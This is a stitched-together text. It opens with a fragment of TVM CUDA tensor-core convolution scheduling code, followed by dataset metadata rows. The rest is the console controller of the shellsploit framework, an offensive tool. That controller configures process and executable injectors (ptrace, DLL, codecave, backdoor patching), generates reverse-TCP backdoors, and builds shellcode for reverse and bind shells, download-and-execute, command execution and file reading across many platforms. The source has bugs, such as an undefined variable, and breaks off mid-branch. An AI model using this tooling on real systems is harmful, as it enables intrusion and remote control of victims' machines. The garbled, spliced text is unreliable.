block_col_warps = cfg["block_col_warps"].val
warp_row_tiles = cfg["warp_row_tiles"].val
warp_col_tiles = cfg["warp_col_tiles"].val
chunk = cfg["chunk"].val
offset = cfg["offset"].val
wmma_m = cfg["wmma_m"].val
vector_width = cfg["vector_width"].val
wmma_k = 16
if wmma_m == 16:
wmma_n = 16
elif wmma_m == 8:
wmma_n = 32
elif wmma_m == 32:
wmma_n = 8
warp_size = 32
block_x = te.thread_axis('blockIdx.x')
block_y = te.thread_axis('blockIdx.y')
block_z = te.thread_axis('blockIdx.z')
thread_x = te.thread_axis('threadIdx.x')
thread_y = te.thread_axis('threadIdx.y')
thread_z = te.thread_axis('threadIdx.z')
def get_strides(extents):
return [np.prod(extents[i:]).tolist() for i in range(len(extents))]
AS_align = chunk * wmma_k + offset
WS_align = warp_col_tiles * block_col_warps * wmma_n + offset
block_factor_n = wmma_m * warp_row_tiles * block_row_warps
block_factor_o = wmma_n * warp_col_tiles * block_col_warps
CS_align = block_factor_o + offset
AS_strides = get_strides([1, 1, AS_align, 1])
AL_strides = get_strides([1, 1, wmma_k, 1])
WS_strides = get_strides([WS_align, 1])
WL_strides = get_strides([wmma_n * warp_col_tiles, 1])
CL_strides = get_strides([1, 1, wmma_n * warp_col_tiles, 1])
CS_strides = get_strides([1, 1, CS_align, 1])
nc, hc, wc, oc = output.op.axis
block_k = s[output].fuse(hc, wc)
s[output].bind(block_k, block_z)
block_i, nc = s[output].split(nc, factor=block_factor_n)
block_j, oc = s[output].split(oc, factor=block_factor_o)
s[output].reorder(block_k, block_i, block_j, nc, oc)
t = s[output].fuse(nc, oc)
t, ti = s[output].split(t, factor=vector_width)
t, tx = s[output].split(t, factor=warp_size)
t, ty = s[output].split(t, factor=block_row_warps)
t, tz = s[output].split(t, factor=block_col_warps)
s[output].bind(block_i, block_x)
s[output].bind(block_j, block_y)
s[output].bind(tz, thread_z)
s[output].bind(ty, thread_y)
s[output].bind(tx, thread_x)
s[output].vectorize(ti)
s[OL].compute_at(s[output], block_j)
nc, hc, wc, oc = OL.op.axis
s[OL].reorder(hc, wc, nc, oc)
s[OL].storage_align(wc, CS_align - 1, CS_align)
oc, ooc = s[OL].split(oc, factor=wmma_n)
oc, oci = s[OL].split(oc, factor=warp_col_tiles)
_, oc = s[OL].split(oc, factor=block_col_warps)
nc, nnc = s[OL].split(nc, factor=wmma_m)
nc, nci = s[OL].split(nc, factor=warp_row_tiles)
_, nc = s[OL].split(nc, factor=block_row_warps)
s[OL].reorder(nc, oc, nci, oci, nnc, ooc)
s[OL].bind(nc, thread_y)
s[OL].bind(oc, thread_z)
s[ConvF].compute_at(s[OL], oc)
n, h, w, o = ConvF.op.axis
n, nnf = s[ConvF].split(n, factor=wmma_m)
o, oof = s[ConvF].split(o, factor=wmma_n)
ic, ii = s[ConvF].split(ic, factor=wmma_k)
ko, ki = s[ConvF].split(ic, factor=chunk)
s[ConvF].reorder(kh, kw, ko, ki, n, o, nnf, oof, ii)
s[AF].compute_at(s[ConvF], ki)
s[WF].compute_at(s[ConvF], ki)
n, h, w, i = AF.op.axis
n, nn = s[AF].split(n, factor=wmma_m)
i, ii = s[AF].split(i, factor=wmma_k)
s[AF].reorder(n, i, nn, ii)
kh, kw, i, o = WF.op.axis
i, ii = s[WF].split(i, factor=wmma_k)
o, oo = s[WF].split(o, factor=wmma_n)
s[WF].reorder(o, i, oo)
s[WF].reorder(i, o, ii, oo)
s[WS].compute_at(s[ConvF], ko)
s[AS].compute_at(s[ConvF], ko)
n, h, w, i = AS.op.axis
s[AS].reorder(h, w, n, i)
s[AS].storage_align(w, AS_align - 1, AS_align)
t = s[AS].fuse(n, i)
t, ti = s[AS].split(t, factor=vector_width)
t, tx = s[AS].split(t, factor=warp_size)
t, ty = s[AS].split(t, factor=block_row_warps)
_, tz = s[AS].split(t, factor=block_col_warps)
s[AS].bind(ty, thread_y)
s[AS].bind(tz, thread_z)
s[AS].bind(tx, thread_x)
s[AS].vectorize(ti)
# Schedule for kernel's share memory
kh, kw, ic, o = WS.op.axis
t = s[WS].fuse(ic, o)
s[WS].storage_align(ic, WS_align - 1, WS_align)
t, ti = s[WS].split(t, factor=vector_width)
t, tx = s[WS].split(t, factor=warp_size)
t, ty = s[WS].split(t, factor=block_row_warps)
_, tz = s[WS].split(t, factor=block_col_warps)
s[WS].bind(ty, thread_y)
s[WS].bind(tz, thread_z)
s[WS].bind(tx, thread_x)
s[WS].vectorize(ti)
shape = (wmma_m, wmma_n, wmma_k)
AS_shape = (wmma_m, 1, 1, wmma_k)
AL_shape = (wmma_m, 1, 1, wmma_k)
WS_shape = (wmma_k, wmma_n)
WL_shape = (wmma_k, wmma_n)
CL_shape = (wmma_m, 1, 1, wmma_n)
CS_shape = (wmma_m, 1, 1, wmma_n)
AL_gemm = te.placeholder(AL_shape, name='A', dtype=in_dtype)
WL_gemm = te.placeholder(WL_shape, name='B', dtype=in_dtype)
k_gemm = te.reduce_axis((0, wmma_k), name="k")
CL_compute = te.compute(CL_shape, lambda ii, t0, t1, jj:
te.sum(AL_gemm[ii, t0, t1, k_gemm].astype(out_dtype) * \
WL_gemm[k_gemm, jj].astype(out_dtype), axis=k_gemm),
name='C')
s[AF].tensorize(nn, intrin_wmma_load_matrix_A(AL_strides, AS_strides, shape,
"row_major", AS_shape, AL_shape, in_dtype))
s[WF].tensorize(ii, intrin_wmma_load_matrix_W(WL_strides, WS_strides, shape,
"row_major", WS_shape, WL_shape, in_dtype))
s[OL].tensorize(nnc, intrin_wmma_store_matrix(CS_strides, CL_strides,
shape, out_dtype, CL_shape, CS_shape))
s[ConvF].tensorize(nnf, intrin_wmma_gemm(AL_gemm, WL_gemm, CL_compute, AL_strides,
WL_strides, CL_strides, shape))
N, OH, OW, CO = get_const_tuple(output.shape)
KH, KW, CI, _ = get_const_tuple(kernel.shape)
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW)
@autotvm.register_topi_compute("conv2d_nhwc_tensorcore.cuda")
def conv2d_nhwc_tensorcore(cfg, data, kernel, strides, padding, dilation, out_dtype):
return nhwc_tensorcore_cuda(cfg, data, kernel, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("conv2d_nhwc_tensorcore.cuda")
def schedule_conv2d_nhwc_tensorcore(cfg, outs):
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'conv2d_nhwc_tensorcore' in op.tag:
schedule_nhwc_tensorcore_cuda(cfg, s, op.output(0))
traverse_inline(s, outs[0].op, _callback)
return s
| true
| true
|
790db224486fee9e2e6acac2ef44531a3d016a9c
| 44,167
|
py
|
Python
|
shell/control.py
|
dromero1452/shellsploit-framework
|
38ce78542fd2dd2ac30f6567972d695ede1e4709
|
[
"MIT"
] | 2
|
2019-12-23T15:47:02.000Z
|
2020-01-06T09:51:57.000Z
|
shell/control.py
|
badfish5150/shellsploit-framework
|
22bb910d33379ca29ddd10ba93a63e9ff1eab99d
|
[
"MIT"
] | null | null | null |
shell/control.py
|
badfish5150/shellsploit-framework
|
22bb910d33379ca29ddd10ba93a63e9ff1eab99d
|
[
"MIT"
] | 1
|
2021-12-23T16:35:24.000Z
|
2021-12-23T16:35:24.000Z
|
#------------------Bombermans Team---------------------------------#
# Author : B3mB4m
# Concat : b3mb4m@protonmail.com
# Project : https://github.com/b3mb4m/Shellsploit
# LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#
import sys
import os
from .core.color import *
from re import findall
from .core.Comp import tab
from lib.base.framework import ShellsploitFramework
if sys.version_info.major >= 3:
raw_input = input
class B3mB4m(ShellsploitFramework):
def __init__(self):
ShellsploitFramework.__init__(self)
self.argvlist = ["None", "None", "None", "None"]
self.disassembly = "None"
self.mycache = "None"
def control(self, string):
bash = bcolors.OKBLUE + bcolors.UNDERLINE + "ssf" + bcolors.ENDC
bash += ":"
bash += bcolors.RED + string + bcolors.ENDC
bash += bcolors.OKBLUE + " > " + bcolors.ENDC
try:
terminal = raw_input(bash)
except KeyboardInterrupt:
B3mB4m.exit("\n[*] (Ctrl + C ) Detected, Trying To Exit ...")
# Injectors
if string[:9] == "injectors":
tab.completion("injectors")
if terminal[:4] == "help":
from .core.help import injectorhelp
injectorhelp()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
# elif terminal[:9] == "need help":
# import XX
# print youtubelink for this module
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:4] == "pids":
B3mB4m.pids("wholelist")
self.control(string)
elif terminal[:6] == "getpid":
B3mB4m.pids(None, terminal[7:])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:5] == "unset":
if string in B3mB4m.bfdlist():
if terminal[6:] == "exe" or terminal[6:] == "file":
self.argvlist[0] = "None"
elif terminal[6:] == "host":
self.argvlist[1] = "None"
elif terminal[6:] == "port":
self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "dll":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[6:] == "exe":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
if terminal[6:] == "pid":
self.argvlist[0] = "None"
elif terminal[6:] == "shellcode":
self.argvlist[1] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if string in B3mB4m.bfdlist():
if terminal[4:7] == "exe" or terminal[4:8] == "file":
self.argvlist[0] = terminal[9:]
elif terminal[4:8] == "host":
self.argvlist[1] = terminal[9:]
elif terminal[4:8] == "port":
self.argvlist[2] = terminal[9:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/tLsInjectorDLL":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:7] == "dll":
self.argvlist[1] = terminal[8:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
elif string == "injectors/Windows/x86/CodecaveInjector":
if terminal[4:7] == "exe":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
else:
if terminal[4:7] == "pid":
self.argvlist[0] = terminal[8:]
elif terminal[4:13] == "shellcode":
if ".txt" in terminal[14:]:
if os.path.isfile(terminal[14:]):
with open(terminal[14:], "r") as shellcode:
cache = shellcode.readlines()
db = ""
for x in database:
db += x.strip().replace('"', "").replace('+', "").strip()
self.argvlist[1] = db
else:
print(bcolors.RED + bcolors.BOLD + "\nFile can't find, please try with full path.\n" + bcolors.ENDC)
self.control(string)
else:
self.argvlist[1] = terminal[14:]
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:14] == "show shellcode":
if string in B3mB4m.bfdlist():
print("This option not available for this module.")
self.control(string)
elif string == "injectors/Windowsx86/tLsInjectorDLL":
self.control(string)
else:
if self.argvlist[1] != "None":
B3mB4m.prettyout(self.argvlist[1])
else:
print("\nYou must set shellcode before this ..\b")
self.control(string)
elif terminal[:12] == "show options":
from .core.Injectoroptions import controlset
if string in B3mB4m.bfdlist():
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
self.control(string)
else:
if string != "injectors/Windows/x86/tLsInjectorDLL":
if self.argvlist[1] != "None":
self.mycache = "process"
controlset(string, self.argvlist[0], self.mycache)
self.control(string)
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:6] == "inject":
if self.argvlist[0] == None or self.argvlist[1] == None:
print("\nYou must set pid/shellcode before inject !\n")
self.control(string)
if string == "injectors/Linux86/ptrace":
from .inject.menager import linux86ptrace
linux86ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Linux64/ptrace":
from .inject.menager import linux64ptrace
linux64ptrace(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/byteman":
from .inject.menager import windows
windows(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/tLsInjectorDLL":
from .inject.menager import winx86tLsDLL
winx86tLsDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/x86/CodecaveInjector":
from .inject.menager import winx86Codecave
winx86Codecave(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/Dllinjector":
from .inject.menager import winDLL
winDLL(self.argvlist[0], self.argvlist[1])
elif string == "injectors/Windows/BFD/Patching":
from .inject.menager import winBFD
winBFD(self.argvlist[0], self.argvlist[1], int(self.argvlist[2]))
# elif string == "injectors/MacOSX/BFD/Patching":
# from .inject.menager import MacBFD
# MacBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/BFD/Patching":
# from .inject.menager import LinuxBFD
# LinuxBFD( FILE, HOST, PORT)
# elif string == "injectors/Linux/ARM/x86/BFD/Patching":
# from .inject.menager import LinuxARMx86BFD
# LinuxARMx86BFD( FILE, HOST, PORT)
# elif string == "FreeBSD/x86/BFD/Patching":
# from .inject.menager import FreeBSDx86
# FreeBSDx86( FILE, HOST, PORT)
self.control(string)
# elif terminal[:7] == "extract":
# Future option
# Make it executable (Dynamic virus land)
# from bla bla import executable
# generator()
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Backdoors
elif string[:9] == "backdoors":
tab.completion("backdoors")
if terminal[:4] == "help":
from .core.help import backdoorshelp
backdoorshelp()
self.control(string)
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "lhost":
self.argvlist[0] = "None"
elif terminal[6:] == "lport":
self.argvlist[1] = "None"
# elif terminal[6:] == "encoder":
# self.argvlist[2] = "None"
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
elif terminal[:3] == "set":
if terminal[4:9].lower() == "lhost":
self.argvlist[0] = terminal[10:]
elif terminal[4:9].lower() == "lport":
self.argvlist[1] = terminal[10:]
# elif terminal[4:11].lower() == "encoder"
# self.argvlist[2] = terminal[11:]
else:
print(bcolors.RED + bcolors.BOLD + "This option is not available." + bcolors.ENDC)
self.control(string)
elif terminal[:8] == "generate":
from .Session.generator import process
# Custom output path will be add ..
if self.argvlist[0] == "None" or self.argvlist[1] == "None":
print("\nSet options before generate payload.\n")
self.control(string)
else:
process(data=string, HOST=self.argvlist[0], PORT=self.argvlist[1], ENCODER=False, logger=True)
self.control(string)
elif terminal[:5] == "clear":
B3mB4m.clean()
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
else:
if not terminal:
self.control(string)
else:
print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
self.control(string)
# Shellcodes
else:
tab.completion("shellcodes")
if terminal[:4] == "help":
# if terminal[5:11] == "output":
# from Outputs.exehelp import help
# print help()
# self.control( string)
from .core.help import shellcodehelp
shellcodehelp()
self.control(string)
elif terminal[:2] == "os":
B3mB4m.oscommand(terminal[3:])
self.control(string)
elif terminal[:4] == "back":
self.argvlist = ["None", "None", "None", "None"]
pass
elif terminal[:4] == "exit":
B3mB4m.exit("\nThanks for using shellsploit !\n")
elif terminal[:10] == "whatisthis":
from .core.whatisthis import whatisthis
if "egg" in string:
message = "Egg-hunt"
elif "tcp" in string or "reverse" in string or "netcat" in string:
message = "Remote"
elif "download" in string:
message = "Download and execute"
else:
message = "Local"
# Add special part for particul
whatisthis(message)
self.control(string)
elif terminal[:5] == "unset":
if terminal[6:] == "encoder":
self.argvlist[0] = "None"
elif terminal[6:] == "iteration":
self.argvlist[1] = "None"
elif terminal[6:] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = "None"
else:
Base.invalidcommand()
elif terminal[6:] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
elif terminal[6:] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = "None"
else:
B3mB4m.invalidcommand()
else:
B3mB4m.invalidcommand()
self.control(string)
elif terminal[:3] == "set":
if terminal[4:8] == "file":
if string in B3mB4m.readlist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "port":
if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "command":
if string in B3mB4m.execlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "link":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[2] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "message":
if string in B3mB4m.messageboxlist():
self.argvlist[2] = terminal[12:]
else:
B3mB4m.invalidcommand()
elif terminal[4:8] == "host":
if string in B3mB4m.reversetcplist():
self.argvlist[3] = terminal[9:]
else:
B3mB4m.invalidcommand()
elif terminal[4:12] == "filename":
if string in B3mB4m.downloadandexecutelist():
self.argvlist[3] = terminal[13:]
else:
B3mB4m.invalidcommand()
elif terminal[4:11] == "encoder":
from .core.lists import encoders
if terminal[12:] not in encoders():
print("This encoder not in list !")
self.control(string)
self.argvlist[0] = terminal[12:]
elif terminal[4:13] == "iteration":
self.argvlist[1] = terminal[14:]
else:
B3mB4m.invalidcommand()
self.control(string)
elif terminal[:12] == "show options":
from .core.SHELLoptions import controlset
if string[:7] == "linux86":
if string == "linux86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/chmod":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/download&exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "solarisx86":
if string == "solarisx86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "solarisx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "linux64":
if string == "linux64/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/mkdir":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "linux":
if string == "linux/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "linux/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx86/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:5] == "osx64":
if string == "osx64/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "osx64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/reverse_tcp2":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/reverse_tcp":
controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/read":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/exec":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x86/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "freebsd_x64/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/exec":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_arm/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:10] == "linux_mips":
if string == "linux_mips/chmod":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
elif string == "linux_mips/reverse_tcp":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "linux_mips/tcp_bind":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
else:
controlset(string, self.argvlist[0], self.argvlist[1])
self.control(string)
elif string[:7] == "windows":
if string == "windows/messagebox":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
elif string == "windows/exec":
controlset(string, self.argvlist[1], self.argvlist[0], self.argvlist[2])
elif string == "windows/download&execute":
controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
elif string == "windows/reverse_tcp":
controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
elif string == "windows/tcp_bind":
controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
self.control(string)
elif terminal[:8] == "generate":
from .database.generator import generator
if string[:7] == "linux86":
if string == "linux86/binsh_spawn":
self.disassembly = generator("linux86", "binsh_spawn")
elif string == "linux86/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "read", FILE=self.argvlist[2])
elif string == "linux86/exec":
if self.argvlist[2] == "None":
print("\nCommand must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "exec", COMMAND=self.argvlist[2])
elif string == "linux86/download&exec":
if self.argvlist[2] == "None":
print("\nLink must be declared.\n")
self.control(string)
elif "/" not in self.argvlist[2]:
print("\nWrong url format example : 127.0.0.1/X\n")
self.control(string)
elif len(self.argvlist[2].split("/")[-1]) != 1:
print("\nYour filename must be one lenght ..\n")
self.control(string)
if "http" in self.argvlist[2] or "https" in self.argvlist[2] or "www." in self.argvlist:
try:
edit = self.argvlist[2].replace("http://", "").replace("https://", "").replace("www.", "")
self.argvlist[2] = edit
except:
pass
self.disassembly = generator("linux86", "download&exec", URL=self.argvlist[2])
elif string == "linux86/chmod":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "chmod", FILE=self.argvlist[2])
elif string == "linux86/tcp_bind":
if self.argvlist[2] == "None":
print("\nPORT must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "tcp_bind", port=self.argvlist[2])
elif string == "linux86/reverse_tcp":
if self.argvlist[2] == "None" or self.argvlist[3] == "None":
print("\nHost&Port must be declared.\n")
self.control(string)
self.disassembly = generator("linux86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:7] == "linux64":
if string == "linux64/binsh_spawn":
self.disassembly = generator("linux64", "binsh_spawn")
elif string == "linux64/tcp_bind":
self.disassembly = generator("linux64", "tcp_bind", port=self.argvlist[2])
elif string == "linux64/reverse_tcp":
self.disassembly = generator("linux64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux64/read":
self.disassembly = generator("linux64", "read", FILE=self.argvlist[2])
if string[:5] == "linux":
if string == "linux/read":
if self.argvlist[2] == "None":
print("\nFile name must be declared.\n")
self.control(string)
self.disassembly = generator("linux", "read", FILE=self.argvlist[2])
elif string == "linux/binsh_spawn":
self.disassembly = generator("linux", "binsh_spawn")
elif string == "linux/tcp_bind":
self.disassembly = generator("linux", "tcp_bind", port=self.argvlist[2])
elif string == "linux/reverse_tcp":
self.disassembly = generator("linux", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx86":
if string == "osx86/tcp_bind":
self.disassembly = generator("osx86", "tcp_bind", port=self.argvlist[2])
elif string == "osx86/binsh_spawn":
self.disassembly = generator("osx86", "binsh_spawn")
elif string == "osx86/reverse_tcp":
self.disassembly = generator("osx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:5] == "osx64":
if string == "osx64/binsh_spawn":
self.disassembly = generator("osx64", "binsh_spawn")
elif string == "osx64/tcp_bind":
self.disassembly = generator("osx64", "tcp_bind", port=self.argvlist[2])
elif string == "osx64/reverse_tcp":
self.disassembly = generator("osx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string[:11] == "freebsd_x86":
if string == "freebsd_x86/binsh_spawn":
self.disassembly = generator("freebsdx86", "binsh_spawn")
elif string == "freebsd_x86/read":
self.disassembly = generator("freebsdx86", "read", FILE=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp":
self.disassembly = generator("freebsdx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/reverse_tcp2":
self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x86/exec":
self.disassembly = generator("freebsdx86", "exec", COMMAND=self.argvlist[2])
elif string == "freebsd_x86/tcp_bind":
self.disassembly = generator("freebsdx86", "tcp_bind", port=self.argvlist[2])
elif string[:11] == "freebsd_x64":
if string == "freebsd_x64/binsh_spawn":
self.disassembly = generator("freebsdx64", "binsh_spawn")
elif string == "freebsd_x64/tcp_bind":
self.disassembly = generator("freebsdx64", "tcp_bind", port=self.argvlist[2], PASSWORD=self.argvlist[3])
elif string == "freebsd_x64/reverse_tcp":
self.disassembly = generator("freebsdx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "freebsd_x64/exec":
self.disassembly = generator("freebsdx64", "exec", COMMAND=self.argvlist[2])
elif string[:9] == "linux_arm":
if string == "linux_arm/chmod":
self.disassembly = generator("linux_arm", "chmod", FILE=self.argvlist[2])
elif string == "linux_arm/binsh_spawn":
self.disassembly = generator("linux_arm", "binsh_spawn")
elif string == "linux_arm/reverse_tcp":
self.disassembly = generator("linux_arm", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_arm/exec":
self.disassembly = generator("linux_arm", "exec", COMMAND=self.argvlist[2])
elif string[:10] == "linux_mips":
if string == "linux_mips/reverse_tcp":
self.disassembly = generator("linux_mips", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
elif string == "linux_mips/binsh_spawn":
self.disassembly = generator("linux_mips", "binsh_spawn")
elif string == "linux_mips/chmod":
self.disassembly = generator("linux_mips", "chmod", FILE=self.argvlist[2])
elif string == "linux_mips/tcp_bind":
self.disassembly = generator("linux_mips", "tcp_bind", port=self.argvlist[2])
elif string[:7] == "windows":
